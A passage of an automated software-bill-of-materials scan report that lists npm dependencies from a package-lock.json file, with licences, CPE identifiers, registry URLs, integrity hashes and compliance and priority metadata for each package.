https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz integrity: sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bd9248df9b4e52cf ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: once 1.4.0' title: once 1.4.0 description: 'Package discovered: once 1.4.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3f85171a571bc28a name: once version: 1.4.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/once@1.4.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/once/-/once-1.4.0.tgz integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w== dependencies: wrappy: '1' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 92e0060edd98f736 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: otplib 12.0.1' title: otplib 12.0.1 description: 'Package discovered: otplib 12.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7b45ff9710a4aaac name: otplib version: 12.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/otplib@12.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz integrity: sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg== dependencies: '@otplib/core': ^12.0.1 '@otplib/preset-default': ^12.0.1 '@otplib/preset-v11': ^12.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1061878b64866643 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: p-limit 2.3.0' title: p-limit 2.3.0 description: 'Package discovered: p-limit 2.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c6cc7a145d3e597c name: p-limit version: 2.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/p-limit@2.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz integrity: sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w== dependencies: p-try: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6cbc6aaefd17b7fc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: p-limit 3.1.0' title: p-limit 3.1.0 description: 'Package discovered: p-limit 3.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bdf7b3073a60eac3 name: p-limit version: 3.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/p-limit@3.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz integrity: sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ== dependencies: yocto-queue: ^0.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 16add8edeff36c6a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: p-locate 4.1.0' title: p-locate 4.1.0 description: 'Package discovered: p-locate 4.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ee16619fa3035ca6 name: p-locate version: 4.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/p-locate@4.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz integrity: sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A== dependencies: p-limit: ^2.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 94f4f30dde8856c2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: p-try 2.2.0' title: p-try 2.2.0 description: 'Package discovered: p-try 2.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ee061a11e32e10c1 name: p-try version: 2.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/p-try@2.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8f14c9999630c748 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: package-json-from-dist 1.0.1' title: package-json-from-dist 1.0.1 description: 'Package discovered: package-json-from-dist 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d82606f27243dac6 name: package-json-from-dist version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BlueOak-1.0.0 spdxExpression: BlueOak-1.0.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/package-json-from-dist@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 09093ffb9ed76376 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: pako 0.2.9' title: pako 0.2.9 description: 'Package discovered: pako 0.2.9' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7762d448aa187997 name: pako version: 0.2.9 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: (MIT AND Zlib) spdxExpression: (MIT AND Zlib) type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/pako@0.2.9 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/pako/-/pako-0.2.9.tgz integrity: sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d21476c4aa5bcc9d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: pako 1.0.11' title: pako 1.0.11 description: 'Package discovered: pako 1.0.11' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8811cee431746c6d name: pako version: 1.0.11 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: (MIT AND Zlib) spdxExpression: (MIT AND Zlib) type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/pako@1.0.11 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/pako/-/pako-1.0.11.tgz integrity: sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b50b24498bc5a2c6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: parse-svg-path 0.1.2' title: parse-svg-path 0.1.2 description: 'Package discovered: parse-svg-path 0.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7c5d21eaeee09ad2 name: parse-svg-path version: 0.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/parse-svg-path@0.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz integrity: sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 09bae738f1e39a33 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: parseley 0.12.1' title: parseley 0.12.1 description: 'Package discovered: parseley 0.12.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 22f6c66ddf9c06f1 name: parseley version: 0.12.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/parseley@0.12.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz integrity: sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw== dependencies: leac: ^0.6.0 peberminta: ^0.9.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 37de8d05673d8403 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: parseurl 1.3.3' title: parseurl 1.3.3 description: 'Package discovered: parseurl 1.3.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 484c0b9a6084b4bb name: parseurl version: 1.3.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/parseurl@1.3.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz integrity: sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4b3d2fa0f1f98ea0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: path-exists 4.0.0' title: path-exists 4.0.0 description: 'Package discovered: path-exists 4.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7c130f49f1f39739 name: path-exists version: 4.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/path-exists@4.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz integrity: sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5bb936b7686247f0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: path-expression-matcher 1.5.0' title: path-expression-matcher 1.5.0 description: 'Package discovered: path-expression-matcher 1.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 802e4db060f878e6 name: path-expression-matcher version: 1.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/path-expression-matcher@1.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz integrity: sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ffd71e909718c27d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: path-key 3.1.1' title: path-key 3.1.1 description: 'Package discovered: path-key 3.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f9cf628256388076 name: path-key version: 3.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/path-key@3.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fbb7614ee3db4371 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: path-parse 1.0.7' title: path-parse 1.0.7 description: 'Package discovered: path-parse 1.0.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9cf335be710ffc91 name: path-parse version: 1.0.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/path-parse@1.0.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - 